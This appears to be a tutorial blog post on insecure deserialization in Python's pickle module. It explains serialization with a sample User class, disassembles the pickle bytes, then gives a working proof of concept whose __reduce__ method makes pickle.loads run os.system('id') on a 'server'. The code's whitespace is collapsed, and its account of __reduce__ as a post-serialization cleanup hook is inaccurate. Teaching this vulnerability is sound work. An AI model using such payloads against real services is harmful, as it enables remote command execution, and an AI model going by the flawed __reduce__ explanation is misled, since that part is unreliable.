Insecure Deserialization is a vulnerability that occurs when a client’s provided stream of binary is converted back to its original form on the server side.
Serialization and Deserialization
The process of converting any data or any object into a stream of binary is called serialization. For example, to store some values like in a game to store information about the player or in web apps to store session-related data on the client side, which later will be used by the web application to reduce multiple requests to the backend server and make the web application faster.
Let’s take an example of the process of serialization in Python. In Python, we use pickle module to serialize or deserialize the data.
# A user class to create some data objectsclassUser:def__init__(self,name,age): self.name = name self.age = agedefsummary(self):return"{} is {} year(s) old.".format(self.name, self.age)# creating an objecthacker =User('Elliot Alderson', 29)print(hacker.summary())
Now let’s serialize the object using pickle module, we can do that using dumps() function from pickle module.
# Serializing the data using dumps() functionserialized = pickle.dumps(hacker)print(serialized)
and here’s the output of our little program
ElliotAldersonis29year(s) old.b'\\x80\\x04\\x95>\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x8c\\x08__main__\\x94\\x8c\\x04User\\x94\\x93\\x94)\\x81\\x94}\\x94(\\x8c\\x04name\\x94\\x8c\\x0fElliot Alderson\\x94\\x8c\\x03age\\x94K\\x1dub.'[Finished in 22ms]
Now this serialized data can be transferred via the network or can be stored on the disk as a file.
# storing the serialized data in a local filewithopen('user_data.pkl', 'wb')as file: file.write(serialized)print('Serialized object is written in \\'user_data.pkl\\' file.')# | Output -----------------------------------# | Elliot Alderson is 29 year(s) old.# | b'\\x80\\x04\\x95>\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x8c\\x08__main__\\x94\\x8c\\x04User\\x94\\x93\\x94)\\x81\\x94}\\x94(\\x8c\\x04name\\x94\\x8c\\x0fElliot Alderson\\x94\\x8c\\x03age\\x94K\\x1dub.'# | Serialized object is written in 'user_data.pkl' file.# | [Finished in 20ms]# |# | $ cat user_data.pkl# | ��>�__main__��User���)��}�(�name��Elliot Alderson��age�Kub.# |# | $ file user_data.pkl# | user_data.pkl: data
We can get a quick disassembly of the serialized data using pickletools module which is provided by default with Python.
import pickle # for data serialization and deserializationimport pickletools # for data dissassembly# The User ClassclassUser:def__init__(self,name,age): self.name = name self.age = agedefsummary(self):return"{} is {} year(s) old.".format(self.name, self.age)# Reading data from saved serialized object filewithopen('user_data.pkl', 'rb')as fh: serialized = fh.read()# getting the dissassembly of serialized dataprint(pickletools.dis(serialized))# Output -----------------------------------# | 0: \\x80 PROTO 4# | 2: \\x95 FRAME 62# | 11: \\x8c SHORT_BINUNICODE '__main__'# | 21: \\x94 MEMOIZE (as 0)# | 22: \\x8c SHORT_BINUNICODE 'User'# | 28: \\x94 MEMOIZE (as 1)# | 29: \\x93 STACK_GLOBAL# | 30: \\x94 MEMOIZE (as 2)# | 31: ) EMPTY_TUPLE# | 32: \\x81 NEWOBJ# | 33: \\x94 MEMOIZE (as 3)# | 34: } EMPTY_DICT# | 35: \\x94 MEMOIZE (as 4)# | 36: ( MARK# | 37: \\x8c SHORT_BINUNICODE 'name'# | 43: \\x94 MEMOIZE (as 5)# | 44: \\x8c SHORT_BINUNICODE 'Elliot Alderson'# | 61: \\x94 MEMOIZE (as 6)# | 62: \\x8c SHORT_BINUNICODE 'age'# | 67: \\x94 MEMOIZE (as 7)# | 68: K BININT1 29# | 70: u SETITEMS (MARK at 36)# | 71: b BUILD# | 72: . STOP# | highest protocol among opcodes = 4# | None
Deserialization of data can be done using the loads() function from pickle module
# deserialization of the datadeserialized = pickle.loads(serialized)print(deserialized.summary())# Output ------------------------------------# | Elliot Alderson is 29 year(s) old.
The complete script
import pickle # for serialization and deserializationimport pickletools # for data dissassembly# A user class to create some data objectsclassUser:def__init__(self,name,age): self.name = name self.age = agedefsummary(self):return"{} is {} year(s) old.".format(self.name, self.age)# creating an objecthacker =User('Elliot Alderson', 29)print(hacker.summary())# Serializing the data using dumps() functionserialized = pickle.dumps(hacker)print(serialized)# storing the serialized data in a local filewithopen('user_data.pkl', 'wb')as file: file.write(serialized)print('Serialized object is written in \\'user_data.pkl\\' file.')# Reading data from saved serialized object filewithopen('user_data.pkl', 'rb') as fh: serializedfd = fh.read()# getting the dissassembly of serialized dataprint(pickletools.dis(serializedfd))# deserialization of the datadeserialized = pickle.loads(serialized)print(deserialized.summary())
The Vulnerability and Exploit
The Vulnerability
The vulnerability arises when we have to accept arbitrary input from the user or serializing user-controllable data, the user can very well add malicious code or data which can harm the system. For example, A web app is using the serialization and deserilization from storing some information in the session cookie, which will be serialized on the client side and deserialized again on the server side. what if we put some malicious code in the data before it’s being serialized, as the process of serialization is happening on the client side.
The Exploit
Let’s demonstrate this practically.
import pickle # for serialization and deserializationimport os # used later to get command executionclassUser:def__reduce__(self):return (os.system, ('id',))
The key function in this script is the __reduce__() function. So what it does is, whenever we try to pickle (serialize) an object, there may be some parts of the object that may not be serialized well, like a open file handle .
Reduce function()
For example, before the with open() function in Python, there was a specific need to close the open file handles using f.close() method. So think of __reduce__() function as a cleanup function, which will be invoked when the serialization of the object is finished. The __reduce__() the function should return a tuple. where the 1st value should be a callable function and the 2nd value should be the arguments of the function, which also should be a tuple as there can be more than one argument for a function.
Adding some malicious function in the object to get a command injection.
import pickle # for serialization and deserializationimport os # used later to get command execution# The original user classclassUser:# the __reduct__() function will be invoked after# the serialization completes.def__reduce__(self):return (os.system, ('id',))def__init__(self,name,age): self.name = name self.age = agedefsummary(self):return"{} is {} year(s) old.".format(self.name, self.age)# creating an object using user classhacker =User('Elliot Alderson', 29)# serializing the objectserialized = pickle.dumps(hacker)print(serialized)# Output -------------------------------------------# | b'\\x80\\x04\\x95\\x1d\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x8c\\x05posix\\x94\\x8c\\x06system\\x94\\x93\\x94\\x8c\\x02id\\x94\\x85\\x94R\\x94.'# | [Finished in 20ms]
This script will create the object file with our malicious code which will include the __reduce__() function.
Now let’s load the data on the server side. here’s the server.py
import pickle# our modified object with the reduce methodserialized =b'\\x80\\x04\\x95\\x1d\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x8c\\x05posix\\x94\\x8c\\x06system\\x94\\x93\\x94\\x8c\\x02id\\x94\\x85\\x94R\\x94.'pickle.loads(serialized)# Output --------------------------------------# | uid=1000(elliot) gid=1000(elliot) groups=1000(elliot),108(vboxusers),962(docker),994(input),998(wheel)# | [Finished in 26ms]